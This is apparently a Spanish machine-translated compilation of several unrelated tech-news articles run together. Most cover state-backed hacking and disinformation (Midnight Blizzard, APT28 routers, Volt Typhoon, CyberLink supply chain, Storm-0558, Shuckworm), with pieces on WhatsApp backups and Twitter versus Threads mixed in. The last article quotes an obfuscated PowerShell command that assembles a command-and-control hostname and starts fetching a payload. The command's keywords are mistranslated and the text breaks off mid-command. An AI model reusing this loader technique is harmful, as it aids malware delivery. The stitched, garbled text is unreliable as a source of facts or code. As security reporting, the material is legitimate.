Los actores respaldados por el Kremlin han intensificado sus esfuerzos para interferir con las elecciones presidenciales de Estados Unidos mediante la siembra de desinformación y narrativas falsas en las redes sociales y sitios de noticias falsas, informaron el miércoles analistas de Microsoft.

Los analistas han identificado varios grupos únicos de tráfico de influencias afiliados al gobierno ruso que buscan influir en el resultado de las elecciones, con el objetivo en gran parte de reducir el apoyo de Estados Unidos a Ucrania y sembrar luchas internas. Hasta ahora, estos grupos han sido menos activos durante el ciclo electoral actual que durante los anteriores, probablemente debido a una temporada de primarias menos disputada.

Alimentando divisiones

En los últimos 45 días, los grupos han sembrado un número creciente de publicaciones en las redes sociales y artículos de noticias falsas que intentan fomentar la oposición al apoyo de Estados Unidos a Ucrania y avivar las divisiones sobre temas candentes como el fraude electoral. Las campañas de influencia también promueven preguntas sobre la salud mental del presidente Biden y los jueces corruptos. En total, Microsoft ha rastreado decenas de operaciones de este tipo en las últimas semanas.

En un informe publicado el miércoles, los analistas de Microsoft escribieron:

La deteriorada relación geopolítica entre Estados Unidos y Rusia deja al Kremlin con poco que perder y mucho que ganar si apunta a las elecciones presidenciales estadounidenses de 2024. Al hacerlo, los actores respaldados por el Kremlin intentan influir en la política estadounidense con respecto a la guerra en Ucrania, reducir el apoyo social y político a la OTAN y atrapar a Estados Unidos en luchas internas internas para distraer la atención del escenario mundial. Los esfuerzos de Rusia hasta ahora en 2024 no son novedosos, sino más bien una continuación de una estrategia de una década para “ganar mediante la fuerza de la política, en lugar de la política de la fuerza”, o medidas activas. Los mensajes sobre Ucrania (a través de los medios tradicionales y las redes sociales) cobraron fuerza en los últimos dos meses con una combinación de campañas encubiertas y abiertas de al menos 70 conjuntos de actividades afiliadas a Rusia que rastreamos.

El más prolífico de los grupos de tráfico de influencias, dijo Microsoft, está vinculado a la Administración Presidencial rusa, que según el centro de estudios Marshall Center, es una institución secreta que actúa como principal guardián del presidente Vladimir Putin. La afiliación destaca “la naturaleza cada vez más centralizada de las campañas de influencia rusa”, un alejamiento de las campañas de años anteriores que dependían principalmente de los servicios de inteligencia y de un grupo conocido como la Agencia de Investigación de Internet.

“Cada actor ruso ha demostrado la capacidad y la voluntad de dirigirse a las audiencias de habla inglesa (y en algunos casos de habla hispana) en Estados Unidos, impulsando la desinformación social y política destinada a presentar al presidente ucraniano Volodymyr Zelenskyy como poco ético e incompetente, a Ucrania como una marioneta. o Estado fallido, y cualquier ayuda estadounidense a Ucrania como apoyo directo a un régimen corrupto y conspirativo”, escribieron los analistas.

Un ejemplo es Storm-1516, el nombre que Microsoft usa para rastrear a un grupo que siembra narrativas anti-Ucrania a través de Internet y fuentes de medios de Estados Unidos. El contenido, publicado en inglés, ruso, francés, árabe y finlandés, con frecuencia se origina a través de desinformación sembrada por un supuesto denunciante o periodista ciudadano a través de un canal de video especialmente creado y luego recogido por una red de sitios web controlados por Storm-1516 que se hacen pasar por fuentes de noticias independientes. Estos sitios de noticias falsas residen en Medio Oriente y África, así como en Estados Unidos, entre ellos DC Weekly, Miami Chronicle e Intel Drop.

Finalmente, una vez que la desinformación ha circulado en los días siguientes, el público estadounidense comienza a amplificarla, en muchos casos sin ser consciente de la fuente original. El siguiente gráfico ilustra el flujo.

El informe del miércoles también se refirió a otro grupo rastreado como Storm-1099, mejor conocido por una campaña llamada Doppelganger. Según el grupo de investigación de desinformación Disinfo Research Lab, la campaña se ha dirigido a varios países desde 2022 con contenido diseñado para socavar el apoyo a Ucrania y sembrar divisiones entre las audiencias. Dos medios estadounidenses vinculados a la tormenta 1099 son Election Watch y 50 States of Lie, dijo Microsoft. La siguiente imagen muestra el contenido publicado recientemente por los medios:

El informe del miércoles también se refirió a otras dos operaciones vinculadas al Kremlin. Uno intenta revivir una campaña perpetuada por NABU Leaks, un sitio web que publicó contenido que alegaba que el entonces vicepresidente Joe Biden se confabuló con el exlíder ucraniano Petro Poroshenko, según Reuters. En enero, Andrei Derkoch, el exparlamentario ucraniano y agente ruso sancionado por Estados Unidos responsable de las filtraciones de NABU, reapareció en las redes sociales por primera vez en dos años. En una entrevista, Derkoch propagó afirmaciones nuevas y antiguas sobre Biden y otras figuras políticas estadounidenses.

La otra operación sigue un manual conocido como pirateo y filtración, en el que los agentes obtienen información privada mediante piratería y la filtran a los medios de comunicación.

Microsoft dijo que los piratas informáticos respaldados por el Kremlin que violaron su red corporativa en enero han ampliado su acceso desde entonces en ataques posteriores dirigidos a clientes y que han comprometido el código fuente y los sistemas internos de la empresa.

La intrusión, que la compañía de software reveló en enero, fue llevada a cabo por Midnight Blizzard, el nombre utilizado para rastrear un grupo de piratas informáticos ampliamente atribuido al Servicio Federal de Seguridad, una agencia de inteligencia rusa. Microsoft dijo en ese momento que Midnight Blizzard obtuvo acceso a las cuentas de correo electrónico de altos ejecutivos durante meses después de explotar por primera vez una contraseña débil en un dispositivo de prueba conectado a la red de la compañía. Microsoft continuó diciendo que no tenía indicios de que su código fuente o sus sistemas de producción hubieran sido comprometidos.

Secretos enviados por correo electrónico

En una actualización publicada el viernes, Microsoft dijo que descubrió evidencia de que Midnight Blizzard había utilizado la información que obtuvo inicialmente para ingresar aún más en su red y comprometer tanto el código fuente como los sistemas internos. El grupo de piratas informáticos, que tiene muchos otros nombres, incluidos APT29, Cozy Bear, CozyDuke, The Dukes, Dark Halo y Nobelium, ha estado utilizando la información patentada en ataques posteriores, no solo contra Microsoft sino también contra sus clientes.

«En las últimas semanas, hemos visto evidencia de que Midnight Blizzard está utilizando información inicialmente extraída de nuestros sistemas de correo electrónico corporativo para obtener, o intentar obtener, acceso no autorizado», decía la actualización del viernes. “Esto ha incluido el acceso a algunos de los repositorios de código fuente y sistemas internos de la empresa. Hasta la fecha, no hemos encontrado evidencia de que los sistemas de atención al cliente alojados en Microsoft se hayan visto comprometidos.

En la divulgación de enero, Microsoft dijo que Midnight Blizzard utilizó un ataque de pulverización de contraseñas para comprometer una «cuenta heredada de inquilino de prueba que no es de producción» en la red de la compañía. Esos detalles significaban que la cuenta no había sido eliminada una vez que fue dada de baja, una práctica que se considera esencial para proteger las redes. Los detalles también significaron que la contraseña utilizada para iniciar sesión en la cuenta era lo suficientemente débil como para ser adivinada enviando un flujo constante de credenciales recopiladas de infracciones anteriores, una técnica conocida como pulverización de contraseñas.

En los meses transcurridos desde entonces, dijo Microsoft el viernes, Midnight Blizzard ha estado explotando la información que obtuvo anteriormente en ataques posteriores que han aumentado una tasa ya alta de pulverización de contraseñas.

Amenaza global sin precedentes

Los funcionarios de Microsoft escribieron:

Es evidente que Midnight Blizzard está intentando utilizar secretos de diferentes tipos que ha encontrado. Algunos de estos secretos se compartieron entre los clientes y Microsoft por correo electrónico y, a medida que los descubrimos en nuestro correo electrónico filtrado, nos hemos comunicado y nos comunicamos con estos clientes para ayudarlos a tomar medidas de mitigación. Midnight Blizzard ha aumentado el volumen de algunos aspectos del ataque, como la difusión de contraseñas, hasta 10 veces en febrero, en comparación con el ya gran volumen que vimos en enero de 2024.

El ataque en curso de Midnight Blizzard se caracteriza por un compromiso significativo y sostenido de los recursos, la coordinación y el enfoque del actor de la amenaza. Es posible que esté utilizando la información que ha obtenido para acumular una imagen de las áreas que atacar y mejorar su capacidad para hacerlo. Esto refleja lo que se ha convertido en un panorama de amenazas globales sin precedentes, especialmente en términos de ataques sofisticados a Estados-nación.

El ataque comenzó en noviembre y no fue detectado hasta enero. Microsoft dijo entonces que la violación permitió a Midnight Blizzard monitorear las cuentas de correo electrónico de altos ejecutivos y personal de seguridad, planteando la posibilidad de que el grupo pudiera leer comunicaciones confidenciales durante hasta tres meses. Microsoft dijo que una motivación para el ataque fue que Midnight Blizzard supiera lo que la compañía sabía sobre el grupo de amenazas. Microsoft dijo en ese momento y reiteró nuevamente el viernes que no tenía evidencia de que los piratas informáticos obtuvieran acceso a los sistemas de cara al cliente.

Midnight Blizzard se encuentra entre las APT más prolíficas, abreviatura de amenazas persistentes avanzadas, término utilizado para grupos de hackers capacitados y bien financiados que en su mayoría están respaldados por estados-nación. El grupo estuvo detrás del ataque a la cadena de suministro de SolarWinds que provocó el pirateo de los Departamentos de Energía, Comercio, Tesoro y Seguridad Nacional de EE. UU. y de unas 100 empresas del sector privado.

La semana pasada, el Centro Nacional de Seguridad Cibernética del Reino Unido (NCSC) y sus socios internacionales advirtieron que en los últimos meses, el grupo de amenazas ha ampliado su actividad para apuntar a la aviación, la educación, las fuerzas del orden, los consejos locales y estatales, los departamentos financieros gubernamentales y las organizaciones militares.

El FBI y sus socios de otros 10 países están instando a los propietarios de Ubiquiti EdgeRouters a revisar sus equipos para detectar signos de que han sido pirateados y están siendo utilizados para ocultar operaciones maliciosas en curso por parte de piratas informáticos estatales rusos.

Los Ubiquiti EdgeRouters son un escondite ideal para los piratas informáticos. El equipo económico, utilizado en hogares y oficinas pequeñas, ejecuta una versión de Linux que puede albergar malware que se ejecuta subrepticiamente detrás de escena. Luego, los piratas informáticos utilizan los enrutadores para llevar a cabo sus actividades maliciosas. En lugar de utilizar infraestructura y direcciones IP que se sabe que son hostiles, las conexiones provienen de dispositivos de apariencia benigna alojados en direcciones con reputación confiable, lo que les permite recibir luz verde de las defensas de seguridad.

Acceso sin restricciones

«En resumen, con acceso raíz a Ubiquiti EdgeRouters comprometidos, los actores de APT28 tienen acceso ilimitado a sistemas operativos basados ​​en Linux para instalar herramientas y ofuscar su identidad mientras realizan campañas maliciosas», escribieron funcionarios del FBI en un aviso el martes.

APT28, uno de los nombres utilizados para rastrear a un grupo respaldado por la Dirección Principal de Inteligencia del Estado Mayor ruso conocido como GRU, ha estado haciendo eso durante al menos los últimos cuatro años, según ha alegado el FBI. A principios de este mes, el FBI reveló que había eliminado discretamente el malware ruso de los enrutadores de hogares y empresas estadounidenses. La operación, que recibió autorización judicial previa, agregó reglas de firewall que evitarían que APT28, también rastreado con nombres como Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear y Sednit, pudiera recuperar el control de los dispositivos.

El martes, funcionarios del FBI señalaron que la operación solo eliminó el malware utilizado por APT28 y bloqueó temporalmente al grupo que usaba su infraestructura para que no los reinfectara. La medida no hizo nada para reparar las vulnerabilidades en los enrutadores ni para eliminar las credenciales débiles o predeterminadas que los piratas informáticos podrían aprovechar para usar los dispositivos una vez más para alojar su malware subrepticiamente.

«El Departamento de Justicia de Estados Unidos, incluido el FBI, y socios internacionales desmantelaron recientemente una botnet GRU que constaba de enrutadores de este tipo», advirtieron. «Sin embargo, los propietarios de dispositivos relevantes deben tomar las acciones correctivas que se describen a continuación para garantizar el éxito a largo plazo del esfuerzo de interrupción e identificar y remediar cualquier compromiso similar».

Esas acciones incluyen:

• Realice un restablecimiento de fábrica del hardware para eliminar todos los archivos maliciosos
• Actualice a la última versión de firmware
• Cambie los nombres de usuario y contraseñas predeterminados
• Implemente reglas de firewall para restringir el acceso externo a los servicios de administración remota.

El aviso del martes decía que APT28 ha estado utilizando los enrutadores infectados desde al menos 2022 para facilitar operaciones encubiertas contra gobiernos, ejércitos y organizaciones de todo el mundo, incluida la República Checa, Italia, Lituania, Jordania, Montenegro, Polonia, Eslovaquia, Turquía. Ucrania, los Emiratos Árabes Unidos y Estados Unidos. Además de los organismos gubernamentales, las industrias a las que se dirigen incluyen la aeroespacial y de defensa, la educación, la energía y los servicios públicos, la hotelería, la manufactura, el petróleo y el gas, el comercio minorista, la tecnología y el transporte. APT28 también se ha dirigido a personas en Ucrania.

Los piratas informáticos rusos obtuvieron el control de los dispositivos después de que ya estaban infectados con Moobot, que es un malware botnet utilizado por actores de amenazas con motivación financiera no afiliados al GRU. Estos actores de amenazas instalaron Moobot después de explotar por primera vez las credenciales de administrador predeterminadas conocidas públicamente que no habían sido eliminadas de los dispositivos por las personas que los poseían. Luego, APT28 utilizó el malware Moobot para instalar scripts personalizados y malware que convirtieron la botnet en una plataforma global de ciberespionaje.

Los piratas informáticos respaldados por China han mantenido el acceso a la infraestructura crítica estadounidense durante “al menos cinco años” con el objetivo a largo plazo de lanzar ciberataques “destructivos”, advirtió el miércoles una coalición de agencias de inteligencia estadounidenses.

Volt Typhoon, un grupo de hackers patrocinado por el Estado con sede en China, ha estado invadiendo las redes de organizaciones de aviación, ferrocarriles, transporte público, autopistas, transporte marítimo, oleoductos, agua y alcantarillado (ninguna de las cuales fue nombrada) en un intento por prevenir -posicionarse para ataques cibernéticos destructivos, dijeron la NSA, CISA y el FBI en un aviso conjunto publicado el miércoles.

Esto marca un «cambio estratégico» en las tradicionales operaciones de ciberespionaje o recopilación de inteligencia de los piratas informáticos respaldados por China, dijeron las agencias, ya que en cambio se preparan para alterar la tecnología operativa en caso de un conflicto o crisis importante.

La publicación del aviso, que fue firmado conjuntamente por agencias de ciberseguridad del Reino Unido, Australia, Canadá y Nueva Zelanda, se produce una semana después de una advertencia similar del director del FBI, Christopher Wray. Hablando durante una audiencia del comité de la Cámara de Representantes de Estados Unidos sobre las amenazas cibernéticas planteadas por China, Wray describió el Volt Typhoon como «la amenaza definitoria de nuestra generación» y dijo que el objetivo del grupo es «perturbar la capacidad de movilización de nuestro ejército» en las primeras etapas de una conflicto anticipado sobre Taiwán, que China reclama como su territorio.

Según el aviso técnico del miércoles, Volt Typhoon ha estado explotando vulnerabilidades en enrutadores, firewalls y VPN para obtener acceso inicial a infraestructura crítica en todo el país. Los piratas informáticos respaldados por China normalmente aprovecharon las credenciales de administrador robadas para mantener el acceso a estos sistemas, según el aviso, y en algunos casos, han mantenido el acceso durante «al menos cinco años».

Este acceso permitió a los piratas informáticos respaldados por el estado llevar a cabo posibles interrupciones como “manipular sistemas de calefacción, ventilación y aire acondicionado (HVAC) en salas de servidores o interrumpir controles críticos de energía y agua, lo que provocó fallas importantes en la infraestructura”, advirtió el aviso. En algunos casos, los piratas informáticos del Volt Typhoon tenían la capacidad de acceder a sistemas de vigilancia con cámaras en instalaciones de infraestructura crítica, aunque no está claro si lo hicieron.

Volt Typhoon también utilizó técnicas de subsistencia, mediante las cuales los atacantes utilizan herramientas y funciones legítimas ya presentes en el sistema objetivo, para mantener una persistencia no descubierta a largo plazo. Los piratas informáticos también llevaron a cabo un “extenso reconocimiento previo al compromiso” en un intento por evitar la detección. «Por ejemplo, en algunos casos, los actores de Volt Typhoon pueden haberse abstenido de usar credenciales comprometidas fuera del horario laboral normal para evitar activar alertas de seguridad sobre actividades anormales de la cuenta», decía el aviso.

En una llamada telefónica el miércoles, altos funcionarios de las agencias de inteligencia estadounidenses advirtieron que Volt Typhoon “no es el único ciberactor respaldado por el Estado chino que lleva a cabo este tipo de actividad”, pero no nombraron a los otros grupos a los que habían estado rastreando.

La semana pasada, el FBI y el Departamento de Justicia de Estados Unidos anunciaron que habían interrumpido la “KV Botnet” dirigida por Volt Typhoon que había comprometido cientos de enrutadores con sede en Estados Unidos para pequeñas empresas y oficinas domésticas. El FBI dijo que pudo eliminar el malware de los enrutadores secuestrados y cortar su conexión con los piratas informáticos patrocinados por el estado chino.

Según un informe de mayo de 2023 publicado por Microsoft, Volt Typhoon ha estado atacando y violando la infraestructura crítica de EE. UU. desde al menos mediados de 2021.

Los piratas informáticos respaldados por el Estado norcoreano están distribuyendo una versión maliciosa de una aplicación legítima desarrollada por CyberLink, un fabricante de software taiwanés, para apuntar a clientes intermedios.

El equipo de Inteligencia de Amenazas de Microsoft dijo el miércoles que piratas informáticos norcoreanos habían comprometido CyberLink para distribuir un archivo de instalación modificado de la compañía como parte de un ataque de amplio alcance a la cadena de suministro.

CyberLink es una empresa de software con sede en Taiwán que desarrolla software multimedia, como PowerDVD, y tecnología de reconocimiento facial AI. Según el sitio web de la empresa, CyberLink posee más de 200 tecnologías patentadas y ha distribuido más de 400 millones de aplicaciones en todo el mundo.

Microsoft dijo que observó actividad sospechosa asociada con el instalador CyberLink modificado, rastreado por la compañía como “LambLoad”, ya el 20 de octubre de 2023. Hasta ahora ha detectado el instalador troyanizado en más de 100 dispositivos en varios países, incluidos Japón, Taiwán, Canadá y Estados Unidos.

El archivo está alojado en una infraestructura de actualización legítima propiedad de CyberLink, según Microsoft, y los atacantes utilizaron un certificado de firma de código legítimo emitido a CyberLink para firmar el ejecutable malicioso, según Microsoft. «Este certificado se ha agregado a la lista de certificados no permitidos de Microsoft para proteger a los clientes de futuros usos maliciosos del certificado», dijo el equipo de Threat Intelligence de Microsoft.

La compañía señaló que una carga útil de la segunda fase observada en esta campaña interactúa con la infraestructura previamente comprometida por el mismo grupo de actores de amenazas.

Microsoft ha atribuido este ataque con “alta confianza” a un grupo al que rastrea como Diamond Sleet, un actor-estado-nación de Corea del Norte vinculado al notorio grupo de hackers Lazarus. Se ha observado que este grupo apunta a organizaciones de tecnología de la información, defensa y medios de comunicación. Y se centra predominantemente en el espionaje, las ganancias financieras y la destrucción de redes corporativas, según Microsoft.

Microsoft dijo que aún no ha detectado actividad práctica en el teclado, pero señaló que los atacantes de Diamond Sleet comúnmente roban datos de sistemas comprometidos, se infiltran en entornos de creación de software, avanzan hacia abajo para explotar a más víctimas e intentan obtener acceso persistente a los entornos de las víctimas.

Microsoft dijo que notificó a CyberLink sobre el compromiso de la cadena de suministro, pero no dijo si había recibido una respuesta o si CyberLink había tomado alguna medida a la luz de los hallazgos de la compañía. La compañía también está notificando a los clientes de Microsoft Defender for Endpoint que se vieron afectados por el ataque.

CyberLink no respondió a las preguntas de TechCrunch.

Es posible que desees comprobar la situación de almacenamiento de tu cuenta de Google si haces una copia de seguridad de tus conversaciones de WhatsApp en Drive en Android. En 2018, WhatsApp y Google anunciaron que podía guardar su historial de chat de WhatsApp en Drive sin que contara para su cuota de almacenamiento. Pero a partir de diciembre de 2023, la copia de seguridad de la aplicación de mensajería en Drive contará para el espacio de almacenamiento en la nube de su cuenta de Google si es usuario beta de WhatsApp. Si no utiliza la versión beta de la aplicación, no sentirá el cambio de política hasta el próximo año, cuando llegue «gradualmente» a todos los dispositivos Android.

Las cuentas personales de Google vienen con 15 GB de almacenamiento gratuito en la nube compartido entre Gmail, Drive y Fotos. En su anuncio, Google señaló que eso es «tres veces más que la mayoría de las plataformas móviles». iCloud de Apple, por ejemplo, sólo viene con 5 GB de espacio libre. Aún así, es muy posible (y tal vez incluso fácil en este momento) alcanzar o superar los 15 GB, dependiendo de cuántas imágenes y archivos haya respaldado y subido.

Google ha vinculado sus herramientas de administración de almacenamiento en su publicación para facilitar la eliminación de archivos grandes o fotos que ya no necesita. También puedes eliminar elementos desde WhatsApp, por lo que ya no se incluirán en tu próxima copia de seguridad. Por supuesto, también tienes la opción de comprar almacenamiento adicional con Google One, lo que te costará al menos 2 dólares al mes por 100 GB. Sin embargo, la compañía promete ofrecer pronto a los usuarios elegibles «promociones únicas y limitadas de Google One», por lo que puede ser mejor esperarlas antes de obtener una suscripción. Tenga en cuenta que este cambio sólo le afectará si realiza una copia de seguridad de su historial de chat utilizando su cuenta personal. Si tiene una cuenta de Workspace a través de su trabajo u otra organización, no tiene que preocuparse de que WhatsApp ocupe una parte de su espacio de almacenamiento en la nube.

Microsoft dijo en junio que un grupo de hackers respaldado por China había robado una clave criptográfica de los sistemas de la empresa. Esta clave permitió a los atacantes acceder a sistemas de correo electrónico Outlook basados ​​en la nube para 25 organizaciones, incluidas varias agencias gubernamentales de EE. UU. Sin embargo, en el momento de la divulgación, Microsoft no explicó cómo los piratas informáticos pudieron comprometer una clave tan sensible y altamente protegida, o cómo pudieron usar la clave para moverse entre sistemas de nivel empresarial y de consumo. Pero una nueva autopsia publicada por la empresa el miércoles explica una cadena de errores y descuidos que permitieron el improbable ataque.

Estas claves criptográficas son importantes en la infraestructura de la nube porque se utilizan para generar «tokens» de autenticación que prueban la identidad de un usuario para acceder a datos y servicios. Microsoft dice que almacena estas claves confidenciales en un «entorno de producción» aislado y con acceso estrictamente controlado. Pero durante una falla particular del sistema en abril de 2021, la clave en cuestión fue un polizón incidental en un caché de datos que salió de la zona protegida.

«Todos los mejores hacks son muertes por 1.000 cortes de papel, no algo en lo que se explota una sola vulnerabilidad y luego se obtienen todos los beneficios», dice Jake Williams, un ex hacker de la Agencia de Seguridad Nacional de EE. UU. que ahora forma parte de la facultad del Instituto de Tecnología Aplicada. Seguridad de la red.

Después del fatídico colapso de un sistema de firma de consumidores, la clave criptográfica terminó en un “volcado de emergencia” generado automáticamente de datos sobre lo que había sucedido. Los sistemas de Microsoft están diseñados para diseñarse de modo que las claves de firma y otros datos confidenciales no terminen en volcados de memoria, pero esta clave se escapó debido a un error. Peor aún, los sistemas creados para detectar datos erróneos en volcados de memoria no lograron marcar la clave criptográfica.

Una vez que el volcado de memoria aparentemente fue examinado y limpiado, se trasladó del entorno de producción a un “entorno de depuración” de Microsoft, una especie de área de clasificación y revisión conectada a la red corporativa habitual de la empresa. Sin embargo, una vez más, un análisis diseñado para detectar la inclusión accidental de credenciales no logró detectar la presencia de la clave en los datos.

Un tiempo después de que todo esto ocurriera en abril de 2021, el grupo de espionaje chino, al que Microsoft llama Storm-0558, comprometió la cuenta corporativa de un ingeniero de Microsoft. Con esta cuenta, los atacantes podían acceder al entorno de depuración donde se almacenaban el desafortunado volcado de memoria y la clave. Microsoft dice que ya no tiene registros de esta época que muestren directamente la cuenta comprometida exfiltrándose del volcado de memoria, «pero este fue el mecanismo más probable por el cual el actor adquirió la clave». Armados con este descubrimiento crucial, los atacantes pudieron comenzar a generar tokens de acceso a cuentas de Microsoft legítimos.

Otra pregunta sin respuesta sobre el incidente fue cómo los atacantes utilizaron una clave criptográfica del registro de fallos de un sistema de firma de consumidores para infiltrarse en las cuentas de correo electrónico empresariales de organizaciones como agencias gubernamentales. Microsoft dijo el miércoles que esto fue posible debido a una falla relacionada con una interfaz de programación de aplicaciones que la compañía había proporcionado para ayudar a los sistemas de los clientes a validar firmas criptográficamente. La API no se había actualizado completamente con bibliotecas que validarían si un sistema debería aceptar tokens firmados con claves de consumidor o claves empresariales y, como resultado, se podría engañar a muchos sistemas para que aceptaran cualquiera de las dos.

ACTUALIZADO con el informe de la carta del abogado: Las peleas reales entre los rivales de la industria tecnológica desde hace mucho tiempo, Elon Musk y Mark Zuckerberg, se han convertido recientemente en una posibilidad inminente. Ahora, Musk podría estar expandiendo el conflicto a la sala del tribunal.

Horas después de que Meta Platforms de Zuckerberg lanzara Threads, un nuevo servicio catalogado como un «asesino de Twitter» que rápidamente atrajo a 30 millones de usuarios, un abogado del servicio propiedad de Musk envió a Meta una carta deliberadamente construida. Criticó a Threads como un «imitador» basado en «secretos comerciales» obtenidos indebidamente. No hubo ninguna acción legal formal que acompañara a la carta, pero fue un claro disparo de advertencia.

Semafor fue el primero en informar sobre la andanada legal, que el medio describió como una señal de que Threads es «el rival más serio hasta ahora para la plataforma caótica, pero aún central, de Musk».

El abogado de Quinn Emanuel, Alex Spiro, escribió en la carta que Twitter “tiene la intención de hacer cumplir estrictamente sus derechos de propiedad intelectual y exige que Meta tome medidas inmediatas para dejar de usar los secretos comerciales de Twitter u otra información altamente confidencial”.

La palabra inicial del ruido de sables legales siguió a un tuit de la directora ejecutiva de Twitter, Linda Yaccarino, que afirmaba que la compañía es «a menudo imitada» pero «nunca puede ser duplicada».

MÁS TEMPRANO:

Mientras Twitter se enfrenta a un nuevo desafío importante de la rama de Instagram Threads, la directora ejecutiva Linda Yaccarino está defendiendo su territorio.

Como era su costumbre mientras dirigía las ventas de publicidad para NBCUniversal, Yaccarino aplaudió después de que Threads recibió una respuesta generalmente positiva a su lanzamiento el miércoles y ganó escala rápidamente.

“A menudo somos imitados, pero la comunidad de Twitter nunca puede ser duplicada”, tuiteó Yaccarino, sin nombrar a ningún imitador específico. Sin embargo, a diferencia de sus ocasionales indirectas pronunciadas en el escenario del Radio City Music Hall, el mensaje de la ejecutiva fue más un lanzamiento de ramo para los usuarios que un empujón a los rivales. “En Twitter, la voz de todos importa”, escribió. “Ya sea que esté aquí para ver cómo se desarrolla la historia, descubrir información en TIEMPO REAL en todo el mundo, compartir sus opiniones o conocer a los demás, en Twitter USTED puede ser real. TÚ creaste la comunidad de Twitter. Y eso es insustituible”.

Repitiendo un término usado a menudo por Elon Musk, quien compró Twitter el otoño pasado por $ 44 mil millones, les dijo a los usuarios que la plataforma “es su plaza pública”.

Threads se puso en marcha el miércoles por la noche, antes de lo esperado. La aplicación se creó «para compartir actualizaciones de texto y unirse a conversaciones públicas», según una publicación de blog oficial que acompaña al lanzamiento. Las publicaciones pueden tener hasta 500 caracteres e incluir enlaces, fotos y videos de hasta 5 minutos de duración. Debido al alcance ya masivo de Instagram y al hecho de que los usuarios pueden iniciar sesión en Threads a través de su cuenta existente de Instagram, Threads atrajo rápidamente a millones de usuarios en sus primeras horas de disponibilidad. El CEO de Meta, Mark Zuckerberg, informó que había superado los 30 millones de registros hasta el jueves por la mañana.

“Debería haber una aplicación de conversaciones públicas con más de mil millones de personas”, escribió Zuckerberg en una publicación de Threads. “Twitter ha tenido la oportunidad de hacer esto, pero no lo ha logrado. Ojalá lo hagamos”.

Las reacciones y reseñas iniciales han sido mixtas a positivas para Threads, y algunos notaron que cierta funcionalidad central de Twitter (recuento de caracteres, botón de edición, etc.) aún no se presenta. Aún así, un tema predominante ha sido la sensación de que Threads es un retroceso a una etapa más orgánica de las redes sociales y mucho más sólida que otras alternativas de Twitter como Mastodon o Bluesky. El Twitter de la era Musk ha sido criticado por los anunciantes y los usuarios por su inestabilidad, las alteraciones en su feed principal, la implementación torpe de la verificación del usuario y los retrocesos en la moderación del contenido. Recientemente, Musk tuvo que jugar a la defensiva una vez más después de imponer un límite profundamente impopular en la cantidad de tweets que pueden ver los usuarios que no pagan por la verificación.

Yaccarino asumió oficialmente el cargo de CEO de Twitter el mes pasado, después de que se filtrara la noticia de su nombramiento en la víspera de la presentación inicial anual de mayo de NBCU a los anunciantes en Radio City.

Aquí está el tuit de Yaccarino:

En Twitter, la voz de todos importa.

Ya sea que esté aquí para ver cómo se desarrolla la historia, descubrir información EN TIEMPO REAL en todo el mundo, compartir sus opiniones o conocer a los demás, en Twitter USTED puede ser real.

TÚ creaste la comunidad de Twitter. Y eso es insustituible. Este…

— Linda Yaccarino (@lindayacc) 6 de julio de 2023

Los piratas informáticos que trabajan para el Servicio de Seguridad Federal de Rusia han montado múltiples ataques cibernéticos que utilizaron malware basado en USB para robar grandes cantidades de datos de objetivos ucranianos para usarlos en su invasión en curso de su vecino más pequeño, dijeron los investigadores.

“Los sectores y la naturaleza de las organizaciones y máquinas objetivo pueden haber dado a los atacantes acceso a cantidades significativas de información confidencial”, escribieron investigadores de Symantec, ahora propiedad de Broadcom, en una publicación del jueves. “Hubo indicios en algunas organizaciones de que los atacantes estaban en las máquinas de los departamentos de recursos humanos de las organizaciones, lo que indica que la información sobre las personas que trabajan en las diversas organizaciones era una prioridad para los atacantes, entre otras cosas”.

El grupo, que Symantec rastrea como Shuckworm y otros investigadores llaman Gamaredon y Armageddon, ha estado activo desde 2014 y ha estado vinculado al FSB de Rusia, el principal servicio de seguridad de ese país. El grupo se enfoca únicamente en obtener inteligencia sobre objetivos ucranianos. En 2020, los investigadores de la firma de seguridad SentinelOne dijeron que el grupo de piratería había «atacado a más de 5000 entidades individuales en Ucrania, con un enfoque particular en las áreas donde están desplegadas las tropas ucranianas».

En febrero, Shuckworm comenzó a implementar una nueva infraestructura de comando y control de malware que ha penetrado con éxito las defensas de múltiples organizaciones ucranianas en el ejército, los servicios de seguridad y el gobierno de ese país. Los miembros del grupo parecen más interesados ​​en obtener información relacionada con información militar confidencial que podría ser objeto de abuso en la invasión en curso de Rusia.

Esta nueva campaña presentó un nuevo malware en forma de un script de PowerShell que propaga Pterodo, una puerta trasera creada por Shuckworm. El script se activa cuando las unidades USB infectadas se conectan a las computadoras objetivo. El script malicioso primero se copia a sí mismo en la máquina de destino para crear un archivo de acceso directo con la extensión rtf.lnk. Los archivos tienen nombres como video_porn.rtf.lnk, no_eliminar.rtf.lnk y evidencia.rtf.lnk. Los nombres, que en su mayoría están en ucraniano, son un intento de atraer a los objetivos para que abran los archivos para que instalen Pterodo en las máquinas.

El script continúa enumerando todas las unidades conectadas a la computadora de destino y se copia a sí mismo en todas las unidades extraíbles adjuntas, muy probablemente con la esperanza de infectar cualquier dispositivo con espacio de aire, que intencionalmente no está conectado a Internet en un intento de evitar que siendo hackeado

Para cubrir sus huellas, Shuckworm ha creado docenas de variantes y ha rotado rápidamente las direcciones IP y la infraestructura que usa para comando y control. El grupo también utiliza servicios legítimos como Telegram y su plataforma de microblogging Telegraph para comando y control en otro intento de evitar la detección.

Shuckworm generalmente usa correos electrónicos de phishing como un vector inicial en las computadoras de los objetivos. Los correos electrónicos contienen archivos adjuntos maliciosos que se hacen pasar por archivos con extensiones, incluidas .docx, .rar, .sfx, lnk y hta. Los correos electrónicos a menudo usan temas como conflictos armados, procesos penales, lucha contra el crimen y protección de los niños como señuelos para lograr que los objetivos abran los correos electrónicos y hagan clic en los archivos adjuntos.

Los investigadores de Symantec dijeron que una computadora infectada que recuperaron en la campaña era típica por la forma en que funciona. Ellos escribieron:

En una víctima, la primera señal de actividad maliciosa fue cuando el usuario pareció abrir un archivo RAR que probablemente se entregó a través de un correo electrónico de phishing y que contenía un documento malicioso.

Después de abrir el documento, se observó que se ejecutaba un comando malicioso de PowerShell para descargar la carga útil de la siguiente etapa del servidor C&C de los atacantes:

«CSIDL_SYSTEMcmd.exe» /c inicio /min «» powershell -w oculto
«$gt=»/obtener.»+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servidorcertificadovalidaciónllamadab
ack=$true;$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$direcciones=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
lista de vestidos[0];$cliente=(nuevo-objeto
